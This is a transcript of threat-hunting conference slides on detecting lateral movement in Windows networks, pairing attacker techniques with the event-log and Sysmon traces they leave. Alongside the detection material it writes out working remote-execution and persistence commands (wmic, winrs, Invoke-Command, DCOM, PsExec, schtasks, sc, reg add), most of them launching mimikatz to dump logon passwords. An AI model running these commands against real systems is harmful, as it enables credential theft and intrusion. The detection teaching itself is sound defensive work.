Hunting Lateral Movement in Windows Infrastructure
-
Upload
sergey-soldatov -
Category
Technology
-
view
926 -
download
30
Transcript of Hunting Lateral Movement in Windows Infrastructure
![Page 1: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/1.jpg)
Hunting Lateral Movement in Windows Infrastructure
Teymur Kheirkhabarov
![Page 2: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/2.jpg)
Who Am I
• Senior SOC Analyst @Kaspersky Lab• SibSAU (Krasnoyarsk) graduate• Ex- Infosec dept. head• Ex- Infosec admin• Ex- System admin • Twitter @HeirhabarovT• www.linkedin.com/in/teymur-kheirkhabarov-73490867/
![Page 3: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/3.jpg)
What we’re going to talk about
• Different ways to launch executables remotely by usingcompromised credentials and operating systemfunctionality;
• How to detect remotely launched executables withWindows Event and Sysmon logs.
![Page 4: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/4.jpg)
Remote file copy over SMB
• Copy to autostart locations for execution on login or boot
• Copy to different locations for further execution via WMI, WinRM, Powershell Remoting, Task Scheduler, Service…
• Programmatically
• Using Explorer
• Using standard console tools:• robocopy C:\tools \\pc0002\ADMIN$\users\public mimikatz.exe
• powershell Copy-Item -Path mimikatz.exe -Destination \\pc0002\C$\users\public
• cmd /c "copy mimikatz.exe \\pc0002\C$\users\public"
• xcopy mimikatz.exe \\pc0002\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
How
• TCP/455 port is accessible on remote host
• Administrative shares are enabled on remote host
Requirements & limitations
![Page 5: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/5.jpg)
Remote File Copy over SMB – events sequence on destination side
E2. Special privileges assigned to new
logon (Windows EID 4672)
E1. Network Logon (Windows EID 4624)
E3. Administrative share access
(Windows EID 5140/5145)
E4. File object access with WriteData or
AddFile rights (Windows EID 4663) – if audit and SACL were configured
![Page 6: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/6.jpg)
Remote File Copy over SMB – the most interesting events
![Page 7: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/7.jpg)
Hunting: search for administrative shares connections
![Page 8: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/8.jpg)
Windows File Auditing
https://www.malwarearchaeology.com/s/Windows-File-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
![Page 9: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/9.jpg)
Hunting: search for file creation/changes in autostart locations
![Page 10: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/10.jpg)
Remote execution via WMI
• Programmatically
• Using standard tools:• wmic /node:pc0002 process call create "cmd /c C:\Users\Public\mimikatz.exe
privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
• powershell Invoke-WmiMethod -ComputerName pc0002 -Class Win32_Process -Name Create -ArgumentList '"cmd /c C:\Users\Public\mimikatz.exeprivilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"'
• powershell -command "&{$process = [WMICLASS]'\\pc0002\ROOT\CIMV2:win32_process'; $process.Create('calc.exe'); }"
• powershell -command "&{$process = get-wmiobject -query 'SELECT * FROM Meta_Class WHERE __Class = \"Win32_Process\"' -namespace 'root\cimv2' -computername pc0002; $process.Create( 'notepad.exe' );}"
How
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
Requirements & limitations
![Page 11: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/11.jpg)
Remote execution via WMI – events sequence on destination side
E2. Special privileges assigned to new
logon (Windows EID 4672)
E1. Network Logon (Windows EID 4624)
E3. WmiPrvSE.exestarts payload file
(Sysmon EID 1)
![Page 12: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/12.jpg)
Remote execution via WMI – the most interesting events
![Page 13: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/13.jpg)
Remote execution via WinRM
• Programmatically
• Using Windows Remote Shell (WinRS) tool:• winrs -r:pc0002.test.local C:\Users\Public\mimikatz.exe privilege::debug
sekurlsa::logonpasswords exit
• winrs -r:pc0002.test.local -u:dadmin C:\Users\Public\mimikatz.exeprivilege::debug sekurlsa::logonpasswords exit
How
• WinRM is enabled on remote host (disabled by default on client Windows versions)
• TCP/5985 (TCP/5986) port is accessible on remote host
Requirements & limitations
![Page 14: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/14.jpg)
Remote execution via WinRM – events sequence on destination side
E2. Special privileges assigned to new
logon (Windows EID 4672)
E1. Network Logon (Windows EID 4624)
E3. svchost.exestarts WinrsHost.exe
(Sysmon EID 1)
E4. WinrsHost.exestarts payload file
(Sysmon EID 1)
![Page 15: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/15.jpg)
Remote execution via WinRM – the most interesting events
![Page 16: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/16.jpg)
Remote execution via Powershell Remoting
• Powershell scripts
• Powershell Invoke-Command cmdlet:• powershell Invoke-Command -ComputerName pc0002.test.local -ScriptBlock
{cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt }
• powershell Invoke-Command -ComputerName pc0002.test.local -credential TEST\dadmin -ScriptBlock {cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt }
How
• WinRM is enabled on remote host (disabled by default on client Windows versions)
• TCP/5985 (TCP/5986) port is accessible on remote host
Requirements & limitations
![Page 17: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/17.jpg)
Remote execution via Powershell Remoting– events sequence on destination side
E2. Special privileges assigned to new
logon (Windows EID 4672)
E1. Network Logon (Windows EID 4624)
E3. svchost.exestarts
wsmprovhost.exe(Sysmon EID 1)
E4. wsmprovhost.exestarts payload file
(Sysmon EID 1)
![Page 18: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/18.jpg)
Remote execution via Powershell Remoting– the most interesting events
![Page 19: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/19.jpg)
Remote execution via MMC20.Application COM
How
• Programmatically• Using powershell:
powershell -command "&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Application','pc0002.test.local')); $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt','7')}"
Requirements & limitations
• TCP/135 port is accessible on remote host• RPC dynamic port range is accessible on remote host
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
![Page 20: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/20.jpg)
E2. Special privileges assigned to new
logon (Windows EID 4672)
E1. Network Logon (Windows EID 4624)
E3. svchost.exestarts mmc.exe(Sysmon EID 1)
E4. mmc.exe starts payload file (Sysmon
EID 1)
Remote execution via MMC20.Application COM – events sequence on destination side
![Page 21: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/21.jpg)
Remote execution via MMC20.Application COM – the most interesting events
![Page 22: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/22.jpg)
Remote execution via PsExec (& clones, e.g. PaExec)
• PsExex:• psexec.exe \\pc0002 -c mimikatz.exe privilege::debug
sekurlsa::logonpasswords exit
• PaExec:• paexec.exe \\pc0002 -c mimikatz.exe privilege::debug
sekurlsa::logonpasswords exit
How
• ADMIN$ administrative share is enabled on remote host
• TCP/445 port is accessible on remote host
Requirements & limitations
![Page 23: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/23.jpg)
E2. Special privileges assigned to new
logon (Windows EID 4672)
E1. Network Logon (Windows EID 4624)
E3. Copying PSEXESVC.exe to
ADMIN$ (Windows EID 5140/5145)
E4. psexesvc service is installed and
started (Windows EID 7045/7036)
Remote execution via PsExec (& clones) –events sequence on destination side
E5. psexesvc.exe is started by
services.exe(Sysmon EID 1)
E6. psexesvc.exestarts payload file
(Sysmon EID 1)
E7. Interaction with payload
stdin/stdout/stderrvia SMB pipes
(Windows EID 5145)
![Page 24: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/24.jpg)
Remote execution via PsExec (& clones) –the most interesting events
![Page 25: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/25.jpg)
Hunting: search for PsExec (& clones) artifacts – services
![Page 26: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/26.jpg)
Hunting: search for PsExec (& clones) artifacts – access to pipes
![Page 27: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/27.jpg)
Remote execution via PsExec (& clones) –the most interesting events
![Page 28: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/28.jpg)
Hunting: search for executions in network logon sessions (WinRM, WMI, PsExec, Powershell Remoting, MMC20 COM)
![Page 29: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/29.jpg)
Remote execution via ShellWindows COM
How
• Programmatically• Using powershell:
powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39','pc0002')); $obj.item().Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:\Windows\System32',$null,0)}"
Requirements & limitations
• TCP/135 port is accessible on remote host• RPC dynamic port range is accessible on remote host
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
![Page 30: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/30.jpg)
Remote execution via ShellBrowserWindow COM
How
• Programmatically• Using powershell:
powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880','pc0002')); $obj.Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:\Windows\System32',$null,0)}"
Requirements & limitations
• TCP/135 port is accessible on remote host• RPC dynamic port range is accessible on remote host• Doesn’t work for Windows 7 destination
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
![Page 31: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/31.jpg)
E2. Special privileges assigned to new
logon (Windows EID 4672)
E1. Network Logon (Windows EID 4624)
Remote execution via ShellWindows or ShellBrowserWindow COM – events sequenceon destination side
E3. explorer.exestarts payload file in
current session (Sysmon EID 1)
![Page 32: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/32.jpg)
Remote execution via via ShellWindowsor ShellBrowserWindow COM – how to detect???
Payload file is executed in the session of the current active user
![Page 33: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/33.jpg)
Remote execution via Scheduled Tasks
• Programmatically
• Standard command line tools:• at \\172.16.205.14 3:55 C:\Users\Public\mimikatz.exe privilege::debug
sekurlsa::logonpasswords exit >> win_mimikatz_output.txt
• schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR "cmd.exe /c C:\users\public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
How
• TCP/135 port and RPC dynamic port range are accessible on remote host (in case of Schtasks usage)
• TCP/445 port is accessible on remote host (in case of AT usage)
Requirements & limitations
![Page 34: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/34.jpg)
Remote execution via Scheduled Tasks –events sequence on destination side
E2. Special privileges assigned to new
logon (Windows EID 4672)
E1. Network Logon (Windows EID 4624)
E3. Access to atsvcSMB Pipe (Windows EID 5145) – in case
of at.exe usage
E6. taskeng.exestarts payload file
(Sysmon EID 1)
E4. Scheduled task is created or updated
(Windows EID 4698/4702)
E5. Task is triggered. svchost.exe starts
taskeng.exe (SysmonEID 1)
Also there are some interesting event in Microsoft-Windows-TaskScheduler/Operational event log
![Page 35: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/35.jpg)
Remote execution via Scheduled Tasks –the most interesting events
![Page 36: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/36.jpg)
Hunting: search for remotely created or updated scheduler tasks
![Page 37: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/37.jpg)
Remote execution via Scheduled Tasks –the most interesting events
![Page 38: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/38.jpg)
Hunting: search for ATSVC pipe connections
![Page 39: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/39.jpg)
Remote execution via Services
• Programmatically
• Standard command line tool:• sc \\pc0002 create "Remote service" binPath= "cmd /c
C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt\"
sc \\pc0002 start "Remote service"
sc \\pc0002 delete »Remote service"
How
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
Requirements & limitations
![Page 40: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/40.jpg)
Remote execution via Services – events sequence on destination side
E2. Special privileges assigned to new
logon (Windows EID 4672)
E1. Network Logon (Windows EID 4624)
E3. New service is installed (Windows
EID 7045/4697)
E4. Start command is sent to installed
service. services.exestarts payload file
(Sysmon EID 1)
E5. A timeout is reached (Windows
EID 7009)
E6. Failure while trying to start
service (Windows EID 7000)
![Page 41: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/41.jpg)
Remote execution via Services – the most interesting events
![Page 42: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/42.jpg)
Hunting: search for remotely created services
![Page 43: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/43.jpg)
Remote registry
How
• Programmatically• Using powershell or reg:
• reg add \\pc0002\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v GoogleUpdater /t REG_SZ /d "cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
• powershell -command "&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(\"LocalMachine\", \"pc0002\"); $key=$reg.OpenSubKey(\"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\",$True); $key.SetValue(\"GoogleUpdater\",\"calc.exe\");}"
Requirements & limitations
• TCP/445 port is accessible on remote host• Remote Registry service is enabled on remote host
![Page 44: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/44.jpg)
Remote registry – events sequence on destination side
E2. Special privileges assigned to new
logon (Windows EID 4672)
E1. Network Logon (Windows EID 4624)
E3. WINREG pipe access (Windows EID
5145)
E4. Registry value is modified (Windows EID
4657) – if audit and SACL were configured
![Page 45: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/45.jpg)
Remote Registry – the most interesting events
![Page 46: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/46.jpg)
Hunting: search for WINREG pipe connections
![Page 47: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/47.jpg)
Windows Registry Auditing
https://www.malwarearchaeology.com/s/Windows-Registry-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
![Page 48: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/48.jpg)
Hunting: search for changes in autostartregistry keys
![Page 49: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/49.jpg)
Remote WMI subscriptions creation
![Page 50: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/50.jpg)
Remote WMI subscriptions creation –events sequence on destination side
E2. Special privileges assigned to new
logon (Windows EID 4672)
E1. Network Logon (Windows EID 4624)
E3. Writing to WMI Namespace (Windows EID 4662) – if audit and SACL were configured
![Page 51: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/51.jpg)
WMI Namespaces Auditing
![Page 52: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/52.jpg)
Remote WMI subscriptions creation – the most interesting events